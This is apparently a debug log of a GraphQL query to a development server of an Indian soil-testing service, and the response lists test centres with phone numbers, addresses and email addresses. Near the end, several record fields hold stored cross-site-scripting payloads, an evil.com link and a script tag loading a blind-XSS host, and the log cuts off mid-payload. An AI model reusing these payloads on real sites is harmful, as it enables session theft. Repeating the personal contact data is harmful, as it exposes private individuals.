{"query": "query GetTestCenters {\n  getTestCenters {\n    name\n    region\n    timing\n    phone\n    address\n    authenticatedUser\n    createdAt\n    updatedAt\n    email\n  }\n}"}
DEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): shc-dev.krishitantra.com:443
DEBUG:urllib3.connectionpool:https://shc-dev.krishitantra.com:443 "POST / HTTP/1.1" 200 70058
INFO:gql.transport.requests:<<< {"data":{"getTestCenters":[{"name":"wrtert","region":{"state":{"_id":"63f87562d2e83876f03f7a2c","name":"MEGHALAYA","createdAt":"2023-02-24T08:29:22.513Z","updatedAt":"2023-10-02T12:57:59.999Z","__v":0,"code":"17"},"district":{"_id":"63f8770bd2e83876f03fa040","state":"63f87562d2e83876f03f7a2c","name":"RI BHOI","createdAt":"2023-02-24T08:36:27.370Z","updatedAt":"2023-10-02T13:43:43.143Z","__v":0,"code":"276"},"geolocation":{"type":"Point","coordinates":[15.320184294564037,77.45303756906075]},"village":{"_id":"63f8770bd2e83876f03fa045","state":"63f87562d2e83876f03f7a2c","district":"63f8770bd2e83876f03fa040","subdistrict":"63f8770bd2e83876f03fa043","name":"Mawiong","version":"1","status":"Inhabitant","createdAt":"2023-02-24T08:36:27.644Z","updatedAt":"2023-10-25T06:40:03.699Z","__v":0,"block":"6492fc53680216eb6c94016f","code":"277658","details":{"codestatus":true}},"subdistrict":{"_id":"63f8758dd2e83876f03f7e21","state":"63f87562d2e83876f03f7a2c","district":"63f87562d2e83876f03f7a2f","name":"Songsak","createdAt":"2023-02-24T08:30:05.500Z","updatedAt":"2023-02-24T08:30:05.500Z","__v":0}},"timing":{"from":"","to":""},"phone":"+918130461500","address":"98XM+2PJ Dasala, Maharashtra, India","authenticatedUser":"649a856e975a6006cb950aae","createdAt":"2024-01-19T14:05:07.552Z","updatedAt":"2024-05-20T07:58:48.634Z","email":"purushottam.cpp@yahoo.com"},{"name":"Amul","region":{"state":{"_id":"63f99fbd519359b7438a84ca","name":"KARNATAKA","createdAt":"2023-02-25T05:42:21.627Z","updatedAt":"2023-10-02T12:58:01.693Z","__v":0,"code":"29"},"district":{"_id":"63f9a27a519359b7438ab96d","state":"63f99fbd519359b7438a84ca","name":"BELAGAVI","createdAt":"2023-02-25T05:54:02.913Z","updatedAt":"2023-10-02T13:44:37.699Z","__v":0,"code":"527"},"geolocation":{"type":"Point","coordinates":[13.962924570740824,77.70165635359116]},"village":{"_id":"63f9a36f519359b7438acc22","state":"63f99fbd519359b7438a84ca","district":"63f9a27a519359b7438ab96d","subdistrict":"63f9a364519359b7438acb3f","name":"Achamatti","version":"1","status":"Inhabitant","createdAt":"2023-02-25T05:58:07.983Z","updatedAt":"2023-10-24T19:15:34.913Z","__v":0,"block":"6492fbdd680216eb6c93f869","code":"598286","details":{"codestatus":true}},"subdistrict":{"_id":"63f9aa05519359b7438b4b0b","state":"63f99fbd519359b7438a84ca","district":"63f9a99b519359b7438b4311","name":"ALNAVAR","createdAt":"2023-02-25T06:26:13.355Z","updatedAt":"2023-02-25T06:26:13.355Z","__v":0}},"timing":{"from":"","to":""},"phone":"+918866357895","address":"Belgaum, Karnataka, India","authenticatedUser":"6508383fa54a70be5da501d4","createdAt":"2024-03-29T14:44:48.963Z","updatedAt":"2024-04-23T07:50:00.596Z","email":"murali.a@gmail.com"},{"name":"BIHU","region":{"state":{"_id":"63f86570d2e83876f03e015b","name":"BIHAR","createdAt":"2023-02-24T07:21:20.259Z","updatedAt":"2023-10-02T12:57:58.718Z","__v":0,"code":"10"},"district":{"_id":"63f86978d2e83876f03e6d5a","state":"63f86570d2e83876f03e015b","name":"ARWAL","createdAt":"2023-02-24T07:38:32.762Z","updatedAt":"2023-10-02T13:43:21.184Z","__v":0,"code":"611"},"geolocation":{"type":"Point","coordinates":[74.4903300706052,17.133456397320163]},"village":{},"subdistrict":{}},"timing":{"from":"","to":""},"phone":"+917684586945","address":"4FMR+94P Wazar, Maharashtra, India","authenticatedUser":"651e63a4ebd20381f0a3dce4","createdAt":"2024-01-19T05:40:43.901Z","updatedAt":"2024-01-19T10:21:02.401Z","email":"abcd4@gmail.com"},{"name":"BIHU","region":{"state":{"_id":"63f86570d2e83876f03e015b","name":"BIHAR","createdAt":"2023-02-24T07:21:20.259Z","updatedAt":"2023-10-02T12:57:58.718Z","__v":0,"code":"10"},"district":{"_id":"63f86978d2e83876f03e6d5a","state":"63f86570d2e83876f03e015b","name":"ARWAL","createdAt":"2023-02-24T07:38:32.762Z","updatedAt":"2023-10-02T13:43:21.184Z","__v":0,"code":"611"},"geolocation":{"type":"Point","coordinates":[74.4903300706052,17.133456397320163]},"village":{},"subdistrict":{}},"timing":{"from":"","to":""},"phone":"+917684586945","address":"4FMR+94P Wazar, Maharashtra, India","authenticatedUser":"65aa0b5be24b9807a411e48e","createdAt":"2024-01-19T05:40:43.901Z","updatedAt":"2024-01-19T10:21:02.401Z","email":"bhiu@gmail.com"},{"name":"ANI","region":{"state":{"_id":"63f9ce47519359b7438e76fa","name":"ANDAMAN AND NICOBAR ISLANDS","createdAt":"2023-02-25T09:00:55.043Z","updatedAt":"2024-03-19T07:34:42.450Z","__v":0,"code":"35"},"district":{"_id":"63f9ce61519359b7438e7999","state":"63f9ce47519359b7438e76fa","name":"NICOBARS","createdAt":"2023-02-25T09:01:21.318Z","updatedAt":"2024-03-18T10:33:22.976Z","__v":0,"code":"603"},"geolocation":{"type":"Point","coordinates":[14.945891561237701,76.16332762430936]},"village":{},"subdistrict":{}},"timing":{"from":"","to":""},"phone":"+916756797689","address":"W5W7+984 Kogali, Karnataka, India","authenticatedUser":"65aa2ea65de520dbe4b1522e","createdAt":"2024-01-19T08:11:18.697Z","updatedAt":"2024-01-19T10:21:11.659Z","email":"nico@gmail.com"},{"name":"xcs","region":{"state":{"_id":"63f9ce47519359b7438e76fa","name":"ANDAMAN AND NICOBAR ISLANDS","createdAt":"2023-02-25T09:00:55.043Z","updatedAt":"2024-03-19T07:34:42.450Z","__v":0,"code":"35"},"district":{"_id":"63f9ce89519359b7438e7d89","state":"63f9ce47519359b7438e76fa","name":"NORTH AND MIDDLE ANDAMAN","createdAt":"2023-02-25T09:02:01.637Z","updatedAt":"2023-10-02T13:44:54.068Z","__v":0,"code":"632"},"geolocation":{"type":"Point","coordinates":[75.54695895645392,13.598060451898942]},"village":{"_id":"63f9ceb4519359b7438e81ac","state":"63f9ce47519359b7438e76fa","district":"63f9ce89519359b7438e7d89","subdistrict":"63f9cea4519359b7438e801f","name":"Adojig (RV) (including EFA)","version":"1","status":"Inhabitant","createdAt":"2023-02-25T09:02:44.567Z","updatedAt":"2023-10-23T07:47:15.516Z","__v":0,"block":"6492fac4680216eb6c93e2c9","code":"645374","details":{"codestatus":true}},"subdistrict":{"_id":"63f9ce47519359b7438e7700","state":"63f9ce47519359b7438e76fa","district":"63f9ce47519359b7438e76fd","name":"Ferrargunj","createdAt":"2023-02-25T09:00:55.240Z","updatedAt":"2023-02-25T09:00:55.240Z","__v":0}},"timing":{"from":"","to":""},"phone":"+918737474745","address":"HGXW+6QG Ravoor, Karnataka, India","authenticatedUser":"65aa513a5e44567c911d30d6","createdAt":"2024-01-19T10:38:50.860Z","updatedAt":"2024-01-19T10:38:50.860Z","email":"sda@gmail.com"},{"name":"agri","region":{"state":{"_id":"63f99fbd519359b7438a84ca","name":"KARNATAKA","createdAt":"2023-02-25T05:42:21.627Z","updatedAt":"2023-10-02T12:58:01.693Z","__v":0,"code":"29"},"district":{"_id":"63f9a57c519359b7438af3ef","state":"63f99fbd519359b7438a84ca","name":"CHAMARAJANAGARA","createdAt":"2023-02-25T06:06:52.363Z","updatedAt":"2023-10-02T13:44:38.586Z","__v":0,"code":"531"},"village":{},"subdistrict":{}},"timing":{"from":"","to":""},"phone":"+914567867543","address":"MP5C+3WH Madwar, Telangana, India","authenticatedUser":"65aa535c19f2bf938b6c02ee","createdAt":"2024-01-19T10:47:56.454Z","updatedAt":"2024-01-19T11:03:18.365Z","email":"rak@gmail.com"},{"name":"mesh","region":{"state":{"_id":"63f99fbd519359b7438a84ca","name":"KARNATAKA","createdAt":"2023-02-25T05:42:21.627Z","updatedAt":"2023-10-02T12:58:01.693Z","__v":0,"code":"29"},"district":{"_id":"63f9a844519359b7438b29d3","state":"63f99fbd519359b7438a84ca","name":"DAKSHINA KANNADA","createdAt":"2023-02-25T06:18:44.690Z","updatedAt":"2023-10-02T13:44:39.303Z","__v":0,"code":"534"},"village":{},"subdistrict":{}},"timing":{"from":"","to":""},"phone":"+915674838475","address":"QRPP+776 Suripally, Telangana, India","authenticatedUser":"65aa577f53667571dc94fcf8","createdAt":"2024-01-19T11:05:35.879Z","updatedAt":"2024-01-19T11:27:30.508Z","email":"raki@gmail.com"},{"name":"udu","region":{"state":{"_id":"63f99fbd519359b7438a84ca","name":"KARNATAKA","createdAt":"2023-02-25T05:42:21.627Z","updatedAt":"2023-10-02T12:58:01.693Z","__v":0,"code":"29"},"district":{"_id":"63f9b89c519359b7438c7e77","state":"63f99fbd519359b7438a84ca","name":"UDUPI","createdAt":"2023-02-25T07:28:28.688Z","updatedAt":"2023-10-02T13:44:42.183Z","__v":0,"code":"549"},"village":{},"subdistrict":{}},"timing":{"from":"","to":""},"phone":"+914563784757","address":"W8FV+8H7 Chinnakomarla, Andhra Pradesh, India","authenticatedUser":"65aa5d2b53667571dc94fd30","createdAt":"2024-01-19T11:29:47.895Z","updatedAt":"2024-01-19T11:31:51.444Z","email":"nadu@gmail.com"},{"name":"B Labs","region":{"state":{"_id":"63f99fbd519359b7438a84ca","name":"KARNATAKA","createdAt":"2023-02-25T05:42:21.627Z","updatedAt":"2023-10-02T12:58:01.693Z","__v":0,"code":"29"},"district":{"_id":"63f99fbd519359b7438a84cd","state":"63f99fbd519359b7438a84ca","name":"BAGALKOTE","createdAt":"2023-02-25T05:42:21.768Z","updatedAt":"2024-03-22T06:38:44.383Z","__v":0,"code":"524"},"village":{},"subdistrict":{}},"timing":{"from":"","to":""},"phone":"+915647897685","address":"GHFV+627 Kadmala Kalva, Andhra Pradesh, India","authenticatedUser":"65aa60645de520dbe4b156f8","createdAt":"2024-01-19T11:43:32.710Z","updatedAt":"2024-03-15T12:32:31.741Z","email":"Banana@gmail.com"},{"name":"rakesh","region":{"state":{"_id":"63f99fbd519359b7438a84ca","name":"KARNATAKA","createdAt":"2023-02-25T05:42:21.627Z","updatedAt":"2023-10-02T12:58:01.693Z","__v":0,"code":"29"},"district":{"_id":"63f9a3d1519359b7438ad39e","state":"63f99fbd519359b7438a84ca","name":"BALLARI","createdAt":"2023-02-25T05:59:45.512Z","updatedAt":"2023-10-02T13:44:37.503Z","__v":0,"code":"528"},"geolocation":{"type":"Point","coordinates":[76.91436227137106,15.762438080228101]},"village":{"_id":"63f9a400519359b7438ad712","state":"63f99fbd519359b7438a84ca","district":"63f9a3d1519359b7438ad39e","subdistrict":"63f9a3fd519359b7438ad6cf","name":"55 Mallapura","version":"1","status":"Inhabitant","createdAt":"2023-02-25T06:00:32.649Z","updatedAt":"2023-10-24T19:43:36.708Z","__v":0,"block":"6492fbdc680216eb6c93f84b","code":"605038","details":{"codestatus":true}},"subdistrict":{"_id":"63f9a574519359b7438af34e","state":"63f99fbd519359b7438a84ca","district":"63f9a4c8519359b7438ae645","name":"ALMEL","createdAt":"2023-02-25T06:06:44.559Z","updatedAt":"2023-02-25T06:06:44.559Z","__v":0}},"timing":{"from":"","to":""},"phone":"+919495131579","address":"CLARENCE MONTEIRO NEAR CHURCH BEACH ROAD MANJESHWAR HOSABETTU KUNJATHUR KASARAGOD","authenticatedUser":"65aa6590c6d1de2f4c6cdd26","createdAt":"2024-01-19T12:05:36.300Z","updatedAt":"2024-01-19T12:05:36.300Z","email":"akshaymonteruoqq@gmail.com"},{"name":"rakesh","region":{"state":{"_id":"63f99fbd519359b7438a84ca","name":"KARNATAKA","createdAt":"2023-02-25T05:42:21.627Z","updatedAt":"2023-10-02T12:58:01.693Z","__v":0,"code":"29"},"district":{"_id":"63f9a27a519359b7438ab96d","state":"63f99fbd519359b7438a84ca","name":"BELAGAVI","createdAt":"2023-02-25T05:54:02.913Z","updatedAt":"2023-10-02T13:44:37.699Z","__v":0,"code":"527"},"geolocation":{"type":"Point","coordinates":[76.3073838579743,23.775259432568593]},"village":{"_id":"63f9a310519359b7438ac4cb","state":"63f99fbd519359b7438a84ca","district":"63f9a27a519359b7438ab96d","subdistrict":"63f9a2f0519359b7438ac249","name":"AVACHARATTI","version":"1","status":"Inhabitant","createdAt":"2023-02-25T05:56:32.720Z","updatedAt":"2023-10-24T18:56:07.160Z","__v":0,"block":"6492fbdc680216eb6c93f853","code":"923721","details":{"codestatus":true}},"subdistrict":{"_id":"63f9a6f8519359b7438b1126","state":"63f99fbd519359b7438a84ca","district":"63f9a5f7519359b7438afd6f","name":"AJJAMPURA","createdAt":"2023-02-25T06:13:12.013Z","updatedAt":"2023-02-25T06:13:12.013Z","__v":0}},"timing":{"from":"","to":""},"phone":"+919495131579","address":"Q8G4+4X2 Banskhedi, Madhya Pradesh, India","authenticatedUser":"65aa694b77693700df7076b5","createdAt":"2024-01-19T12:21:31.563Z","updatedAt":"2024-01-19T12:21:31.563Z","email":"akshaymonteruedssdo@gmail.com"},{"name":"surzz","region":{"state":{"_id":"63f99fbd519359b7438a84ca","name":"KARNATAKA","createdAt":"2023-02-25T05:42:21.627Z","updatedAt":"2023-10-02T12:58:01.693Z","__v":0,"code":"29"},"district":{"_id":"63f99fbd519359b7438a84cd","state":"63f99fbd519359b7438a84ca","name":"BAGALKOTE","createdAt":"2023-02-25T05:42:21.768Z","updatedAt":"2024-03-22T06:38:44.383Z","__v":0,"code":"524"},"village":{},"subdistrict":{}},"timing":{"from":"","to":""},"phone":"+919495131579","address":"CX9C+P9X Nirven, Telangana, India","authenticatedUser":"65aa6a76c6d1de2f4c6cdd49","createdAt":"2024-01-19T12:26:31.128Z","updatedAt":"2024-03-15T12:35:01.570Z","email":"akshaymonteruoxcvbn@gmail.com"},{"name":"char","region":{"state":{"_id":"63f99fbd519359b7438a84ca","name":"KARNATAKA","createdAt":"2023-02-25T05:42:21.627Z","updatedAt":"2023-10-02T12:58:01.693Z","__v":0,"code":"29"},"district":{"_id":"63f9a57c519359b7438af3ef","state":"63f99fbd519359b7438a84ca","name":"CHAMARAJANAGARA","createdAt":"2023-02-25T06:06:52.363Z","updatedAt":"2023-10-02T13:44:38.586Z","__v":0,"code":"531"},"village":{},"subdistrict":{}},"timing":{"from":"","to":""},"phone":"+916364683456","address":"PX3Q+22W Kencharamanahal, Karnataka, India","authenticatedUser":"65aa6cc726af96b205a1903b","createdAt":"2024-01-19T12:36:23.840Z","updatedAt":"2024-01-19T12:36:58.985Z","email":"charm12@gmail.com"},{"name":"bcom","region":{"state":{"_id":"63f9ce47519359b7438e76fa","name":"ANDAMAN AND NICOBAR ISLANDS","createdAt":"2023-02-25T09:00:55.043Z","updatedAt":"2024-03-19T07:34:42.450Z","__v":0,"code":"35"},"district":{"_id":"63f9ce47519359b7438e76fd","state":"63f9ce47519359b7438e76fa","name":"SOUTH ANDAMANS","createdAt":"2023-02-25T09:00:55.142Z","updatedAt":"2023-10-02T13:44:54.244Z","__v":0,"code":"602"},"geolocation":{"type":"Point","coordinates":[85.98894790673016,20.95155176403479]},"village":{"_id":"63f9ce55519359b7438e786f","state":"63f9ce47519359b7438e76fa","district":"63f9ce47519359b7438e76fd","subdistrict":"63f9ce47519359b7438e7700","name":"Anjali Nallaha (JPPC)","version":"1","status":"Un-Inhabitant","createdAt":"2023-02-25T09:01:09.841Z","updatedAt":"2023-10-23T07:47:33.078Z","__v":0,"block":"6492fac4680216eb6c93e2cb","code":"645507","details":{"codestatus":true}},"subdistrict":{"_id":"63f9ce9a519359b7438e7f23","state":"63f9ce47519359b7438e76fa","district":"63f9ce89519359b7438e7d89","name":"Mayabunder","createdAt":"2023-02-25T09:02:18.213Z","updatedAt":"2023-02-25T09:02:18.213Z","__v":0}},"timing":{"from":"","to":""},"phone":"+919495131579","address":"XX2Q+JHG Gobara Ghati, Odisha, India","authenticatedUser":"65aa7ab48933e41a809c5de9","createdAt":"2024-01-19T13:35:48.848Z","updatedAt":"2024-01-19T13:35:48.848Z","email":"RESR@gmail.com"},{"name":"sjdkb12","region":{"state":{"_id":"63f99fbd519359b7438a84ca","name":"KARNATAKA","createdAt":"2023-02-25T05:42:21.627Z","updatedAt":"2023-10-02T12:58:01.693Z","__v":0,"code":"29"},"district":{"_id":"63f9a066519359b7438a9120","state":"63f99fbd519359b7438a84ca","name":"BENGALURU URBAN","createdAt":"2023-02-25T05:45:10.832Z","updatedAt":"2023-10-02T13:44:38.223Z","__v":0,"code":"525"},"village":{},"subdistrict":{}},"timing":{"from":"","to":""},"phone":"+919495131579","address":"3MJ8+G7Q Kumtha, Maharashtra, India","authenticatedUser":"65aa7bafc6d1de2f4c6cdf38","createdAt":"2024-01-19T13:39:59.721Z","updatedAt":"2024-03-18T06:29:52.094Z","email":"akshaymonteruo1@gmail.com"},{"name":"asd","region":{"state":{"_id":"63f9ce47519359b7438e76fa","name":"ANDAMAN AND NICOBAR ISLANDS","createdAt":"2023-02-25T09:00:55.043Z","updatedAt":"2024-03-19T07:34:42.450Z","__v":0,"code":"35"},"district":{"_id":"63f9ce61519359b7438e7999","state":"63f9ce47519359b7438e76fa","name":"NICOBARS","createdAt":"2023-02-25T09:01:21.318Z","updatedAt":"2024-03-18T10:33:22.976Z","__v":0,"code":"603"},"geolocation":{"type":"Point","coordinates":[77.08010939226517,15.185182807012003]},"village":{"_id":"63f9ce7e519359b7438e7c81","state":"63f9ce47519359b7438e76fa","district":"63f9ce61519359b7438e7999","subdistrict":"63f9ce7a519359b7438e7c20","name":"7 km Farm - 645196","version":"1","status":"Inhabitant","createdAt":"2023-02-25T09:01:50.543Z","updatedAt":"2024-03-18T10:34:42.773Z","__v":0,"block":"6492fac4680216eb6c93e2c3","code":"645196","details":{"codestatus":true}},"subdistrict":{"_id":"63f9ce61519359b7438e799c","state":"63f9ce47519359b7438e76fa","district":"63f9ce61519359b7438e7999","name":"Car Nicobar","createdAt":"2023-02-25T09:01:21.413Z","updatedAt":"2023-02-25T09:01:21.413Z","__v":0}},"timing":{"from":"","to":""},"phone":"+914567891230","address":"53PJ+32H Byradevanahalli, Karnataka, India","authenticatedUser":"65aa80eb70f5942deae2a6b2","createdAt":"2024-01-19T14:02:19.358Z","updatedAt":"2024-01-19T14:02:19.358Z","email":"harshagowdah298@gmail.com"},{"name":"asd","region":{"state":{"_id":"63f99fbd519359b7438a84ca","name":"KARNATAKA","createdAt":"2023-02-25T05:42:21.627Z","updatedAt":"2023-10-02T12:58:01.693Z","__v":0,"code":"29"},"district":{"_id":"63f99fbd519359b7438a84cd","state":"63f99fbd519359b7438a84ca","name":"BAGALKOTE","createdAt":"2023-02-25T05:42:21.768Z","updatedAt":"2024-03-22T06:38:44.383Z","__v":0,"code":"524"},"geolocation":{"type":"Point","coordinates":[76.3964077348066,16.262084107801023]},"village":{"_id":"63f9a039519359b7438a8dd8","state":"63f99fbd519359b7438a84ca","district":"63f99fbd519359b7438a84cd","subdistrict":"63f9a029519359b7438a8c96","name":"Adihal","version":"1","status":"Inhabitant","createdAt":"2023-02-25T05:44:25.878Z","updatedAt":"2023-10-24T16:56:52.916Z","__v":0,"block":"6492fbdb680216eb6c93f83b","code":"598944","details":{"codestatus":true}},"subdistrict":{"_id":"63f9a6f8519359b7438b1126","state":"63f99fbd519359b7438a84ca","district":"63f9a5f7519359b7438afd6f","name":"AJJAMPURA","createdAt":"2023-02-25T06:13:12.013Z","updatedAt":"2023-02-25T06:13:12.013Z","__v":0}},"timing":{"from":"","to":""},"phone":"+911457896522","address":"796W+RHM Rayangola, Karnataka, India","authenticatedUser":"65aa81557845e6ce8d95f85a","createdAt":"2024-01-19T14:04:05.730Z","updatedAt":"2024-01-19T14:04:05.730Z","email":"abcd45@gmail.com"},{"name":"Boso lab","region":{"state":{"_id":"63f957b089d86ca9e2c00e14","name":"ANDHRAPRADESH","createdAt":"2023-02-25T00:34:56.898Z","updatedAt":"2023-02-25T00:34:56.898Z","__v":0,"code":"28"},"district":{"_id":"63f99c7a519359b7438a472b","state":"63f957b089d86ca9e2c00e14","name":"Bapatla","createdAt":"2023-02-25T05:28:26.004Z","updatedAt":"2023-10-02T13:44:33.363Z","__v":0,"code":"750"},"geolocation":{"type":"Point","coordinates":[13.6287557,79.4191795]},"village":{},"subdistrict":{}},"timing":{"from":"","to":""},"phone":"+918884444403","address":"Tirupati, Andhra Pradesh, India","authenticatedUser":"65b0f1a422107bb5890395a7","createdAt":"2024-01-24T11:16:52.723Z","updatedAt":"2024-01-24T11:17:22.300Z","email":"vijaya74@gmail.com"},{"name":"ktstl","region":{"state":{"_id":"63f87562d2e83876f03f7a2c","name":"MEGHALAYA","createdAt":"2023-02-24T08:29:22.513Z","updatedAt":"2023-10-02T12:57:59.999Z","__v":0,"code":"17"},"district":{"_id":"63f87562d2e83876f03f7a2f","state":"63f87562d2e83876f03f7a2c","name":"EAST GARO HILLS","createdAt":"2023-02-24T08:29:22.606Z","updatedAt":"2023-10-02T13:43:42.425Z","__v":0,"code":"273"},"village":{},"subdistrict":{}},"timing":{"from":"","to":""},"phone":"+918822334477","address":"Q8XQ+RWR Bajathuru, Karnataka, India","authenticatedUser":"65b10673c1bdcf0fbdf8019c","createdAt":"2024-01-24T12:45:39.475Z","updatedAt":"2024-03-21T08:33:47.487Z","email":"ktstl@gmail.com"},{"name":"agra stl","region":{"state":{"_id":"63f600f38cec41e6c9607e6b","name":"UTTAR PRADESH","createdAt":"2023-02-22T11:48:03.783Z","updatedAt":"2023-10-02T12:57:58.538Z","__v":0,"code":"9"},"district":{"_id":"63f600f38cec41e6c9607e6e","state":"63f600f38cec41e6c9607e6b","name":"AGRA","createdAt":"2023-02-22T11:48:03.883Z","updatedAt":"2023-10-02T13:43:07.424Z","__v":0,"code":"118"},"geolocation":{"type":"Point","coordinates":[78.28404363252801,28.21015926584625]},"village":{"_id":"63f601538cec41e6c9608732","state":"63f600f38cec41e6c9607e6b","district":"63f600f38cec41e6c9607e6e","subdistrict":"63f6012e8cec41e6c96083d4","name":"Abhaidopura","version":"2","status":"Inhabitant","createdAt":"2023-02-22T11:49:39.471Z","updatedAt":"2023-10-27T17:24:50.217Z","__v":0,"block":"6492fd11680216eb6c9411ad","code":"124838","details":{"codestatus":true}},"subdistrict":{"_id":"63f6010c8cec41e6c96080b2","state":"63f600f38cec41e6c9607e6b","district":"63f600f38cec41e6c9607e6e","name":"Agra","createdAt":"2023-02-22T11:48:28.774Z","updatedAt":"2023-02-22T11:48:28.774Z","__v":0}},"timing":{"from":"","to":""},"phone":"+911234567890","address":"676M+3J7 Satoha, Uttar Pradesh, India","authenticatedUser":"65b8ca5d60b0732cc6aee35b","createdAt":"2024-01-30T10:07:26.102Z","updatedAt":"2024-01-30T10:07:26.102Z","email":"palanduhfpcl12@gmail.com"},{"name":"Sync","region":{"state":{"_id":"63f87562d2e83876f03f7a2c","name":"MEGHALAYA","createdAt":"2023-02-24T08:29:22.513Z","updatedAt":"2023-10-02T12:57:59.999Z","__v":0,"code":"17"},"district":{"_id":"63f87562d2e83876f03f7a2f","state":"63f87562d2e83876f03f7a2c","name":"EAST GARO HILLS","createdAt":"2023-02-24T08:29:22.606Z","updatedAt":"2023-10-02T13:43:42.425Z","__v":0,"code":"273"},"geolocation":{"type":"Point","coordinates":[76.76933591160218,13.112695687951414]},"village":{"_id":"63f8759ed2e83876f03f7fc2","state":"63f87562d2e83876f03f7a2c","district":"63f87562d2e83876f03f7a2f","subdistrict":"63f8758dd2e83876f03f7e21","name":"Aberamgre","version":"1","status":"Inhabitant","createdAt":"2023-02-24T08:30:22.406Z","updatedAt":"2023-10-24T16:51:09.719Z","__v":0,"block":"6492fc51680216eb6c940145","code":"275203","details":{"codestatus":true}},"subdistrict":{"_id":"6492b80a882c8da8477370f4","state":"63f87562d2e83876f03f7a2c","district":"63f879b6d2e83876f03fe05c","name":"Adokgre","createdAt":"2023-06-21T08:42:50.989Z","updatedAt":"2023-06-21T08:42:50.989Z","__v":0}},"timing":{"from":"","to":""},"phone":"+919999999999","address":"mangalore","authenticatedUser":"65ba767a21641050d190ae4a","createdAt":"2024-01-31T16:34:02.887Z","updatedAt":"2024-01-31T16:34:02.887Z","email":"jqw123@aba.com"},{"name":"asd","region":{"state":{"_id":"63f87a1836497c055ce09df5","name":"WEST BENGAL","createdAt":"2023-02-24T08:49:28.636Z","updatedAt":"2023-10-02T12:58:00.339Z","__v":0,"code":"19"},"district":{"_id":"63f8939dd2e83876f042280b","state":"63f87a1836497c055ce09df5","name":"24 PARAGANAS NORTH","createdAt":"2023-02-24T10:38:21.932Z","updatedAt":"2023-10-02T13:43:50.703Z","__v":0,"code":"303"},"geolocation":{"type":"Point","coordinates":[88.408773929558,22.873828940703685]},"village":{"_id":"63f8950dd2e83876f04242b6","state":"63f87a1836497c055ce09df5","district":"63f8939dd2e83876f042280b","subdistrict":"63f89503d2e83876f0424200","name":"Mahishgot","version":"1","status":"Inhabitant","createdAt":"2023-02-24T10:44:29.809Z","updatedAt":"2023-02-24T10:44:29.809Z","__v":0},"subdistrict":{"_id":"63f88f2d36497c055ce29783","state":"63f87a1836497c055ce09df5","district":"63f88ef236497c055ce2947d","name":"Alipurduar - I","createdAt":"2023-02-24T10:19:25.616Z","updatedAt":"2023-02-24T10:19:25.616Z","__v":0}},"timing":{"from":"","to":""},"phone":"+919876543289","address":"VCF5+GGJ Bhatpara, West Bengal, India","authenticatedUser":"65d348c9f885a946e3648e91","createdAt":"2024-02-19T12:25:45.909Z","updatedAt":"2024-02-19T12:25:45.909Z","email":"teacher10@gmail.com"},{"name":"kar","region":{"state":{"_id":"63f99fbd519359b7438a84ca","name":"KARNATAKA","createdAt":"2023-02-25T05:42:21.627Z","updatedAt":"2023-10-02T12:58:01.693Z","__v":0,"code":"29"},"district":{"_id":"63f9a844519359b7438b29d3","state":"63f99fbd519359b7438a84ca","name":"DAKSHINA KANNADA","createdAt":"2023-02-25T06:18:44.690Z","updatedAt":"2023-10-02T13:44:39.303Z","__v":0,"code":"534"},"geolocation":{"type":"Point","coordinates":[14.143807699929937,76.41194640883975]},"village":{},"subdistrict":{}},"timing":{"from":"","to":""},"phone":"+916754678987","address":"4CV6+GQG Kenne Hadlu, Karnataka, India","authenticatedUser":"65e812ab84478fc56e164b11","createdAt":"2024-03-06T06:52:27.938Z","updatedAt":"2024-03-06T06:58:14.857Z","email":"kavya1@gmail.com"},{"name":"<a href=\"evil.com\">click</a>","region":{"state":{"_id":"63f9ce47519359b7438e76fa","name":"ANDAMAN AND NICOBAR ISLANDS","createdAt":"2023-02-25T09:00:55.043Z","updatedAt":"2024-03-19T07:34:42.450Z","__v":0,"code":"35"},"district":{"_id":"63f9ce61519359b7438e7999","state":"63f9ce47519359b7438e76fa","name":"NICOBARS","createdAt":"2023-02-25T09:01:21.318Z","updatedAt":"2024-03-18T10:33:22.976Z","__v":0,"code":"603"},"geolocation":{"type":"Point","coordinates":["",""]},"village":{"_id":"63f9ce7d519359b7438e7c63","state":"63f9ce47519359b7438e76fa","district":"63f9ce61519359b7438e7999","subdistrict":"63f9ce7a519359b7438e7c20","name":"Not yet named","version":"1","status":"Inhabitant","createdAt":"2023-02-25T09:01:49.289Z","updatedAt":"2023-02-25T09:01:49.289Z","__v":0},"subdistrict":{"_id":"63f9ce61519359b7438e799c","state":"63f9ce47519359b7438e76fa","district":"63f9ce61519359b7438e7999","name":"Car Nicobar","createdAt":"2023-02-25T09:01:21.413Z","updatedAt":"2023-02-25T09:01:21.413Z","__v":0}},"timing":{"from":"","to":""},"phone":"+919876543212","address":"<a href=\"evil.com\">click</a>","authenticatedUser":"65ec90ddd0b0bb1a796f3a82","createdAt":"2024-03-09T16:39:57.880Z","updatedAt":"2024-03-09T16:39:57.880Z","email":"cccc@gmail.com"},{"name":"\"><script src=https://loverboy.bxss.in></script>","region":{"state":{"_id":"63f9ce47519359b7438e76fa","name":"ANDAMAN AND NICOBAR ISLANDS","createdAt":"2023-02-25T09:00:55.043Z","updatedAt":"2024-03-19T07:34:42.450Z","__v":0,"code":"35"},"district":{"_id":"63f9ce61519359b7438e7999","state":"63f9ce47519359b7438e76fa","name":"NICOBARS","createdAt":"2023-02-25T09:01:21.318Z","updatedAt":"2024-03-18T10:33:22.976Z","__v":0,"code":"603"},"geolocation":{"type":"Point","coordinates":["",""]},"village":{"_id":"63f9ce7d519359b7438e7c63","state":"63f9ce47519359b7438e76fa","district":"63f9ce61519359b7438e7999","subdistrict":"63f9ce7a519359b7438e7c20","name":"Not yet named","version":"1","status":"Inhabitant","createdAt":"2023-02-25T09:01:49.289Z","updatedAt":"2023-02-25T09:01:49.289Z","__v":0},"subdistrict":{"_id":"63f9ce61519359b7438e799c","state":"63f9ce47519359b7438e76fa","district":"63f9ce61519359b7438e7999","name":"Car Nicobar","createdAt":"2023-02-25T09:01:21.413Z","updatedAt":"2023-02-25T09:01:21.413Z","__v":0}},"timing":{"from":"","to":""},"phone":"+919876543212","address":"\"><script 